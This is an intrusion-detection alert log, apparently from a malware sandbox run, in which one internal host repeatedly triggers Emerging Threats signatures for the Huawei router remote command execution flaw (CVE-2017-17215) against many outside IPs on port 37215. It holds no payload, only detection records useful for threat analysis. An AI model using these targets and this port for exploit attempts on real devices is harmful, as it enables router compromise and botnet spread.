                                                    07/10/24-08:26:45.633588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5977437215192.168.2.14197.81.106.121
                                                    07/10/24-08:26:55.384907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5026037215192.168.2.1441.99.157.144
                                                    07/10/24-08:27:33.956245TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5233037215192.168.2.14157.197.76.230
                                                    07/10/24-08:26:14.780604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4578037215192.168.2.14161.88.119.252
                                                    07/10/24-08:26:11.501688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5866237215192.168.2.14197.249.140.55
                                                    07/10/24-08:26:23.308313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4607837215192.168.2.14126.167.34.39
                                                    07/10/24-08:26:31.108287TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4602637215192.168.2.1441.165.79.30
                                                    07/10/24-08:26:43.770002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4754237215192.168.2.14197.96.220.187
                                                    07/10/24-08:26:22.227550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3492837215192.168.2.14153.72.233.186
                                                    07/10/24-08:26:49.910333TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4183437215192.168.2.14197.150.93.239
                                                    07/10/24-08:27:17.040867TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4106037215192.168.2.14197.192.149.121
                                                    07/10/24-08:26:33.255406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4207637215192.168.2.14197.64.230.35
                                                    07/10/24-08:27:23.920658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4457837215192.168.2.14197.29.181.166
                                                    07/10/24-08:26:52.008729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4206237215192.168.2.14131.155.47.60
                                                    07/10/24-08:26:36.387027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6079837215192.168.2.14197.81.68.59
                                                    07/10/24-08:26:43.848073TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5078837215192.168.2.14197.90.141.117
                                                    07/10/24-08:27:02.674320TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4003037215192.168.2.14176.22.80.113
                                                    07/10/24-08:27:14.855642TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4033837215192.168.2.1441.252.99.219
                                                    07/10/24-08:26:43.888378TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3327837215192.168.2.1472.181.78.72
                                                    07/10/24-08:26:28.880093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4925837215192.168.2.14157.103.183.74
                                                    07/10/24-08:26:17.999719TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6041437215192.168.2.14197.140.64.115
                                                    07/10/24-08:26:43.781564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5563437215192.168.2.1497.169.216.223
                                                    07/10/24-08:27:13.903981TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4739037215192.168.2.14197.182.204.40
                                                    07/10/24-08:27:23.881648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5305237215192.168.2.1496.206.129.68
                                                    07/10/24-08:27:05.179313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4549037215192.168.2.14197.52.26.194
                                                    07/10/24-08:27:13.973446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5854837215192.168.2.14197.169.180.137
                                                    07/10/24-08:26:13.830488TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5991037215192.168.2.14157.208.30.141
                                                    07/10/24-08:27:28.100122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5457837215192.168.2.1441.140.141.16
                                                    07/10/24-08:27:07.371632TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3698637215192.168.2.14157.233.14.37
                                                    07/10/24-08:27:30.554316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4015437215192.168.2.1441.17.123.203
                                                    07/10/24-08:26:38.581201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3993437215192.168.2.1441.43.146.6
                                                    07/10/24-08:27:08.301300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5103037215192.168.2.1441.227.0.215
                                                    07/10/24-08:26:20.182114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3515437215192.168.2.1441.254.10.138
                                                    07/10/24-08:26:13.745015TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4201037215192.168.2.14147.148.215.139
                                                    07/10/24-08:27:27.141035TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5931037215192.168.2.14157.54.192.166
                                                    07/10/24-08:26:28.811368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4727437215192.168.2.14197.112.195.82
                                                    07/10/24-08:26:28.927122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4610837215192.168.2.14101.70.46.33
                                                    07/10/24-08:26:36.436089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4875437215192.168.2.1441.131.138.215
                                                    07/10/24-08:26:48.002361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5513637215192.168.2.14185.9.171.26
                                                    07/10/24-08:27:33.818731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3963637215192.168.2.14157.252.83.179
                                                    07/10/24-08:26:51.992041TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3512437215192.168.2.14197.41.253.133
                                                    07/10/24-08:27:30.532639TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5759437215192.168.2.14157.25.48.124
                                                    07/10/24-08:27:11.566038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4925837215192.168.2.1441.174.35.57
                                                    07/10/24-08:27:14.003355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5030237215192.168.2.14157.38.24.203
                                                    07/10/24-08:26:29.861363TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5424237215192.168.2.14157.109.230.7
                                                    07/10/24-08:26:41.365312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3422037215192.168.2.1441.116.10.115
                                                    07/10/24-08:27:10.664170TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4183037215192.168.2.14157.237.227.216
                                                    07/10/24-08:26:55.462575TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4555637215192.168.2.1441.21.18.4
                                                    07/10/24-08:26:43.833874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4526037215192.168.2.1441.65.142.118
                                                    07/10/24-08:27:19.324318TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4529637215192.168.2.14157.177.165.158
                                                    07/10/24-08:27:07.265553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4864437215192.168.2.14197.85.242.168
                                                    07/10/24-08:26:41.525598TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4246437215192.168.2.14204.121.104.176
                                                    07/10/24-08:26:26.585190TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5006837215192.168.2.1451.191.248.202
                                                    07/10/24-08:26:43.721021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5443637215192.168.2.1431.173.195.45
                                                    07/10/24-08:27:22.783603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5785437215192.168.2.1441.61.76.232
                                                    07/10/24-08:26:38.614287TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5913637215192.168.2.14157.98.102.131
                                                    07/10/24-08:26:31.065444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4070037215192.168.2.1441.67.74.223
                                                    07/10/24-08:26:15.864839TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6061437215192.168.2.14157.53.112.70
                                                    07/10/24-08:26:20.170023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3478237215192.168.2.1441.177.30.143
                                                    07/10/24-08:26:34.242902TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3965837215192.168.2.14114.168.187.255
                                                    07/10/24-08:27:30.464786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4997437215192.168.2.14157.168.67.197
                                                    07/10/24-08:26:41.407237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4857637215192.168.2.14197.92.125.207
                                                    07/10/24-08:26:36.433898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5318237215192.168.2.14197.33.2.105
                                                    07/10/24-08:27:24.882807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4540837215192.168.2.14157.245.46.200
                                                    07/10/24-08:26:48.009015TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4628437215192.168.2.14157.251.13.42
                                                    07/10/24-08:27:34.127373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4886037215192.168.2.14119.24.30.97
                                                    07/10/24-08:26:29.887676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4213037215192.168.2.1441.205.80.140
                                                    07/10/24-08:27:22.758689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4443237215192.168.2.1441.118.145.216
                                                    07/10/24-08:26:13.780678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5797037215192.168.2.1441.156.136.103
                                                    07/10/24-08:27:28.154911TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3296037215192.168.2.1441.193.212.65
                                                    07/10/24-08:26:43.752135TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3951437215192.168.2.1441.77.54.6
                                                    07/10/24-08:27:05.128413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3768237215192.168.2.1474.161.74.123
                                                    07/10/24-08:26:33.266829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5469237215192.168.2.14157.1.24.121
                                                    07/10/24-08:26:38.563022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6062837215192.168.2.14111.13.238.108
                                                    07/10/24-08:26:43.655197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5863237215192.168.2.1441.152.155.231
                                                    07/10/24-08:26:47.994856TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4514237215192.168.2.14196.125.115.8
                                                    07/10/24-08:26:52.082361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5738837215192.168.2.14157.185.114.68
                                                    07/10/24-08:27:27.136540TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3901837215192.168.2.1441.131.125.240
                                                    07/10/24-08:27:13.884965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4056637215192.168.2.1441.113.211.121
                                                    07/10/24-08:26:11.177651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5570637215192.168.2.14197.57.176.135
                                                    07/10/24-08:26:26.549983TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3814837215192.168.2.1441.29.115.217
                                                    07/10/24-08:26:26.596367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4971437215192.168.2.1464.88.236.39
                                                    07/10/24-08:27:10.561451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5958037215192.168.2.1479.253.41.185
                                                    07/10/24-08:27:17.008672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5611437215192.168.2.14157.30.184.230
                                                    07/10/24-08:27:07.272615TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3978837215192.168.2.14197.122.2.38
                                                    07/10/24-08:27:14.844780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4775037215192.168.2.14120.225.206.229
                                                    07/10/24-08:26:28.777569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3697837215192.168.2.14197.124.73.27
                                                    07/10/24-08:26:34.242772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3352837215192.168.2.1441.123.173.77
                                                    07/10/24-08:26:25.474716TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6043437215192.168.2.1467.131.44.115
                                                    07/10/24-08:26:42.361617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5286837215192.168.2.14197.230.15.220
                                                    07/10/24-08:27:14.863402TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3621437215192.168.2.14197.126.193.185
                                                    07/10/24-08:27:10.621432TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3954637215192.168.2.14197.38.89.6
                                                    07/10/24-08:27:27.112460TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5698237215192.168.2.1441.150.158.165
                                                    07/10/24-08:26:42.463708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4157437215192.168.2.14197.235.12.216
                                                    07/10/24-08:27:02.857576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3573037215192.168.2.14157.57.31.31
                                                    07/10/24-08:26:38.609336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5781637215192.168.2.14197.129.217.58
                                                    07/10/24-08:26:22.290306TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4708437215192.168.2.1493.89.186.154
                                                    07/10/24-08:26:41.568062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5831237215192.168.2.1441.192.167.65
                                                    07/10/24-08:26:25.489238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4616437215192.168.2.14177.55.234.15
                                                    07/10/24-08:26:34.252438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4621237215192.168.2.14167.76.17.227
                                                    07/10/24-08:27:17.059656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5316437215192.168.2.14157.227.17.10
                                                    07/10/24-08:26:11.566830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4194837215192.168.2.1492.30.83.197
                                                    07/10/24-08:27:32.507738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3861437215192.168.2.1441.209.24.143
                                                    07/10/24-08:27:33.947643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4801637215192.168.2.14157.187.118.98
                                                    07/10/24-08:27:27.148686TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3362637215192.168.2.1441.142.60.40
                                                    07/10/24-08:26:33.201607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5045837215192.168.2.14197.19.202.110
                                                    07/10/24-08:27:07.380446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5996837215192.168.2.14200.251.142.167
                                                    07/10/24-08:26:28.827711TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4536037215192.168.2.14157.37.167.38
                                                    07/10/24-08:26:45.616284TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4913637215192.168.2.14110.255.128.166
                                                    07/10/24-08:27:20.454576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3381037215192.168.2.14122.11.6.75
                                                    07/10/24-08:26:25.505039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5776237215192.168.2.1441.235.168.88
                                                    07/10/24-08:26:14.809030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4979237215192.168.2.14197.28.220.45
                                                    07/10/24-08:27:02.857366TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4737637215192.168.2.1441.20.198.43
                                                    07/10/24-08:26:28.635714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5326637215192.168.2.14197.138.32.125
                                                    07/10/24-08:26:43.872058TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5758837215192.168.2.14112.239.72.238
                                                    07/10/24-08:27:27.089146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5957637215192.168.2.1469.68.95.36
                                                    07/10/24-08:26:28.641864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4772437215192.168.2.1419.168.204.201
                                                    07/10/24-08:26:31.105929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4669837215192.168.2.1441.234.57.230
                                                    07/10/24-08:26:34.267157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3490437215192.168.2.1441.37.212.88
                                                    07/10/24-08:26:38.557842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5237837215192.168.2.14106.64.100.130
                                                    07/10/24-08:26:11.116364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5327837215192.168.2.1441.195.22.236
                                                    07/10/24-08:26:28.746894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5740037215192.168.2.14157.127.236.142
                                                    07/10/24-08:26:31.095696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5001237215192.168.2.1441.233.176.159
                                                    07/10/24-08:27:08.389862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3542637215192.168.2.1441.157.192.224
                                                    07/10/24-08:27:28.151143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4269237215192.168.2.1441.13.1.219
                                                    07/10/24-08:27:19.279611TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4043037215192.168.2.14117.9.244.199
                                                    07/10/24-08:27:33.874672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5131837215192.168.2.1441.254.73.109
                                                    07/10/24-08:26:41.394588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5265437215192.168.2.1441.58.189.186
                                                    07/10/24-08:27:28.177795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5032637215192.168.2.14197.81.119.218
                                                    07/10/24-08:26:13.811202TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5056637215192.168.2.1444.87.16.33
                                                    07/10/24-08:26:57.637294TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5828637215192.168.2.14205.78.78.128
                                                    07/10/24-08:26:42.415895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3376437215192.168.2.1441.245.237.165
                                                    07/10/24-08:26:28.874415TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4547037215192.168.2.1441.74.176.197
                                                    07/10/24-08:27:14.898018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5564437215192.168.2.1441.20.189.77
                                                    07/10/24-08:26:26.516253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3539037215192.168.2.14157.102.1.210
                                                    07/10/24-08:27:08.389316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4346637215192.168.2.1446.158.98.79
                                                    07/10/24-08:26:20.098304TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5773037215192.168.2.14157.226.51.193
                                                    07/10/24-08:26:22.218998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4356037215192.168.2.14157.27.175.103
                                                    07/10/24-08:26:41.619076TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3631237215192.168.2.1441.109.73.68
                                                    07/10/24-08:27:02.749504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5077237215192.168.2.14157.59.84.60
                                                    07/10/24-08:26:14.775624TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4436437215192.168.2.1441.20.135.174
                                                    07/10/24-08:26:36.362536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5973837215192.168.2.1468.67.65.158
                                                    07/10/24-08:27:08.423540TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5817237215192.168.2.14197.214.243.133
                                                    07/10/24-08:27:17.088897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3842837215192.168.2.14157.20.245.180
                                                    07/10/24-08:27:23.853234TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5201637215192.168.2.14197.124.5.252
                                                    07/10/24-08:26:17.992846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5346037215192.168.2.1441.18.169.34
                                                    07/10/24-08:27:05.230730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5698837215192.168.2.1441.124.132.154
                                                    07/10/24-08:27:07.365607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5864237215192.168.2.14163.32.226.132
                                                    07/10/24-08:26:38.615907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5242437215192.168.2.14157.132.209.152
                                                    07/10/24-08:27:02.845496TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4775037215192.168.2.1441.114.37.65
                                                    07/10/24-08:26:55.423552TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5031237215192.168.2.1441.135.85.99
                                                    07/10/24-08:27:32.526839TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5319637215192.168.2.14197.44.65.251
                                                    07/10/24-08:26:47.986495TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5360037215192.168.2.1441.21.244.187
                                                    07/10/24-08:26:41.493980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4128837215192.168.2.14157.221.31.99
                                                    07/10/24-08:26:42.400738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4954637215192.168.2.14197.251.176.133
                                                    07/10/24-08:26:47.837566TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4449637215192.168.2.14197.49.180.176
                                                    07/10/24-08:27:05.226106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5495037215192.168.2.1441.46.135.43
                                                    07/10/24-08:26:25.517538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5380637215192.168.2.1441.61.62.184
                                                    07/10/24-08:27:10.605752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3667237215192.168.2.14157.157.105.218
                                                    07/10/24-08:26:38.613798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5035037215192.168.2.1441.0.3.38
                                                    07/10/24-08:26:33.217527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3494437215192.168.2.14197.216.230.193
                                                    07/10/24-08:26:34.225930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3577837215192.168.2.1465.111.199.137
                                                    07/10/24-08:26:57.510241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3804637215192.168.2.14193.43.196.76
                                                    07/10/24-08:26:26.597424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4717837215192.168.2.1441.90.73.248
                                                    07/10/24-08:26:25.483820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3578437215192.168.2.14197.120.5.196
                                                    07/10/24-08:26:23.294372TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3598237215192.168.2.14197.119.251.188
                                                    07/10/24-08:26:36.368939TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5947837215192.168.2.14103.32.189.219
                                                    07/10/24-08:26:55.376718TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4325037215192.168.2.1484.4.38.35
                                                    07/10/24-08:26:20.137909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4156037215192.168.2.1441.231.236.174
                                                    07/10/24-08:26:23.290002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5661237215192.168.2.14157.84.92.150
                                                    07/10/24-08:27:14.841554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4433037215192.168.2.14142.29.169.35
                                                    07/10/24-08:26:29.766874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5883637215192.168.2.14157.179.148.66
                                                    07/10/24-08:27:33.854360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4117037215192.168.2.14157.8.222.232
                                                    07/10/24-08:26:57.633994TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4588837215192.168.2.1441.128.131.174
                                                    07/10/24-08:26:22.234901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3298637215192.168.2.1465.88.39.16
                                                    07/10/24-08:27:34.131322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6074437215192.168.2.14137.100.57.109
                                                    07/10/24-08:27:10.583365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4803437215192.168.2.14157.203.110.221
                                                    07/10/24-08:27:14.822336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6002437215192.168.2.1441.80.7.112
                                                    07/10/24-08:26:55.406930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3782437215192.168.2.14157.52.110.243
                                                    07/10/24-08:27:05.114349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4618437215192.168.2.14157.151.92.248
                                                    07/10/24-08:26:11.576586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5442037215192.168.2.14169.11.165.80
                                                    07/10/24-08:27:10.664170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5905037215192.168.2.14157.167.141.91
                                                    07/10/24-08:26:55.391627TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4152237215192.168.2.1441.89.159.95
                                                    07/10/24-08:27:33.915892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3464837215192.168.2.14157.252.222.133
                                                    07/10/24-08:26:43.670311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4713037215192.168.2.1459.162.92.51
                                                    07/10/24-08:26:20.128612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4637037215192.168.2.1441.227.100.130
